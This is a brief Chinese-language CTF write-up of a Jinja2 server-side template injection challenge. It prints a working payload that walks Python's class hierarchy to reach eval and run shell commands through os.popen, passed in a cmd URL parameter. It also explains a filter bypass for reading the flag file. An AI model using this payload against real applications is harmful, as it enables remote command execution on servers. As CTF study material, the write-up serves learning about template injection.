这是题目打开之后是这样子
由于题目标题有提示,很容易知道这是模板注入ssti
上图可以就说是模板注入的模板了
通过测试,大概可以知道是jinja2的题型
对于这种题型,构造payload 又有模板
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}
{% endif %}
{% endfor %}
只需要url/?cmd=模板块
当然本就是为了获取flag ,又由于flag本来被过滤
所以可以把ls改为’cat/f/lag’来绕过
最终获得flag